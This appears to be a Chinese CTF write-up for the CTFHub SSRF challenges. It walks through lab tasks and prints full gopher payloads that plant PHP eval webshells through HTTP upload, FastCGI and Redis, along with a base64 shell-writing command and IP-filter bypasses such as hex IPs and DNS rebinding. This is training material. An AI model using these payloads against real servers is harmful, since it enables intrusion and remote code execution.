技能树--Web--SSRF

内网访问

开启题目

尝试访问位于127.0.0.1的flag.php吧

进入环境

根据提示输入即可

127.0.0.1/flag.php

伪协议读取文件

开启题目

尝试去读取一下Web目录下的flag.php吧

进入环境，根据提示输入

file:///var/www/html/flag.php

鼠标右键查看页面源代码

端口扫描

开启题目

来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦,

进入环境

127.0.0.1/flag.php

根据提示输入端口号，使用bp抓包

发送到攻击模块

设置payload

开始攻击

使用爆破后的端口

127.0.0.1:8256

POST请求

开启题目

这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

进入环境

尝试访问

http://127.0.0.1/flag.php

查看页面源代码

输入框输入key的值抓包

使用gopher协议提交post请求

gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1
Host:127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36key=fcc06e47e6334a4620426a117b4796fd

一次URL编码

推荐使用CTF在线工具箱：CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码

将其中的%0a全部替换为%0d%0a

gopher%3A//127.0.0.1%3A80/_POST%20/flag.php%20HTTP/1.1%0AHost%3A127.0.0.1%0AContent-Type%3A%20application/x-www-form-urlencoded%0AContent-Length%3A%2036%0A%0Akey%3Dfcc06e47e6334a4620426a117b4796fd

在最后也加上一个%0d%0a,表示请求结束

二次URL编码

gopher%253A//127.0.0.1%253A80/_POST%2520/flag.php%2520HTTP/1.1%250d%250aHost%253A127.0.0.1%250d%250aContent-Type%253A%2520application/x-www-form-urlencoded%250d%250aContent-Length%253A%252036%250d%250a%250d%250akey%253Dfcc06e47e6334a4620426a117b4796fd%250d%250a

将其中的双斜杠和冒号复原，然后在url后输入即可

gopher://127.0.0.1:80/_POST

上传文件

开启题目

这次需要上传一个文件到flag.php了.祝你好运

进入环境，尝试访问

127.0.0.1/flag.php

桌面新建一个1.php文件

没有提交按钮，点击F12打开查看器，构造一个提交按钮

<input type="submit" name="submit">

选择文件上传，使用bp抓包，点击提交

修改为以下内容

复制，一次URL编码

gopher%3A//127.0.0.1%3A80/_POST%20/flag.php%20HTTP/1.1%0AHost%3A127.0.0.1%0AContent-Type%3A%20multipart/form-data%3B%20boundary%3D---------------------------9596500622043926231400034453%0AContent-Length%3A%20379%0A%0A-----------------------------9596500622043926231400034453%0AContent-Disposition%3A%20form-data%3B%20name%3D%22file%22%3B%20filename%3D%221.php%22%0AContent-Type%3A%20application/octet-stream%0A%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27xxaq%27%5D%29%3B%3F%3E%0A-----------------------------9596500622043926231400034453%0AContent-Disposition%3A%20form-data%3B%20name%3D%22submit%22%0A%0A%E9%8E%BB%E6%84%AA%E6%B0%A6%E9%8F%8C%E3%83%A8%EE%87%97%0A-----------------------------9596500622043926231400034453--

记事本中全部替换，结尾加一个%0d%0a

二次URL编码

gopher%253A//127.0.0.1%253A80/_POST%2520/flag.php%2520HTTP/1.1%250d%250aHost%253A127.0.0.1%250d%250aContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------9596500622043926231400034453%250d%250aContent-Length%253A%2520379%250d%250a%250d%250a-----------------------------9596500622043926231400034453%250d%250aContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250d%250aContent-Type%253A%2520application/octet-stream%250d%250a%250d%250a%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527xxaq%2527%255D%2529%253B%253F%253E%250d%250a-----------------------------9596500622043926231400034453%250d%250aContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250d%250a%250d%250a%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250d%250a-----------------------------9596500622043926231400034453--%250d%250a

再次访问即可

FastCGI协议

开启题目

进入环境

http://127.0.0.1/flag.php

运行程序

python2 gopherus.py

python2 gopherus.py --exploit fastcgi

/var/www/html/index.php

echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH123%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%7B%04%00%3C%3Fphp%20system%28%27echo%20%22PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4%3D%22%20%7C%20base64%20-d%20%3E%20shell.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

进行一次URL编码

gopher%3A//127.0.0.1%3A9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH123%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%257B%2504%2500%253C%253Fphp%2520system%2528%2527echo%2520%2522PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4%253D%2522%2520%257C%2520base64%2520-d%2520%253E%2520shell.php%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

使用中国菜刀运行一句话木马

点击根目录，发现一个flag文件

双击打开即可

Redis协议

开启题目

这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!

进入环境，尝试访问

运行程序

python2 gopherus.py

python2 gopherus.py --exploit redis

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27xxaq%27%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

进行一次URL编码

gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527xxaq%2527%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

修改以下内容，再次访问

gopher://127.0.0.1:6379

shell.php

使用中国菜刀运行一句话木马

打开根目录

双击打开即可

URL Bypass

开启题目

请求的URL中必须包含http://notfound.ctfhub.com，来尝试利用URL的一些特殊地方绕过这个限制吧

进入环境

根据提示尝试访问

http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

开启题目

这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

进入环境

根据提示替换127.0.0.1/flag.php

localhost/flag.php

0x7f000001/flag.php

302跳转 Bypass

开启题目

SSRF中有个很重要的一点是请求可能会跟随302跳转，尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧

进入环境，尝试访问

127.0.0.1/flag.php

根据提示对IP进行绕过

localhost/flag.php

0.0.0.0/flag.php

DNS重绑定 Bypass

开启题目

关键词：DNS重绑定。剩下的自己来吧，也许附件中的链接能有些帮助

查看附件，访问附件网站：rbndr.us dns rebinding service

进入环境，尝试访问

在解析⽹站上获取解析到内⽹IP的域名并作访问即可获取其Flag

7f000001.7f000002.rbndr.us

返回，再次访问即可

7f000001.7f000002.rbndr.us/flag.php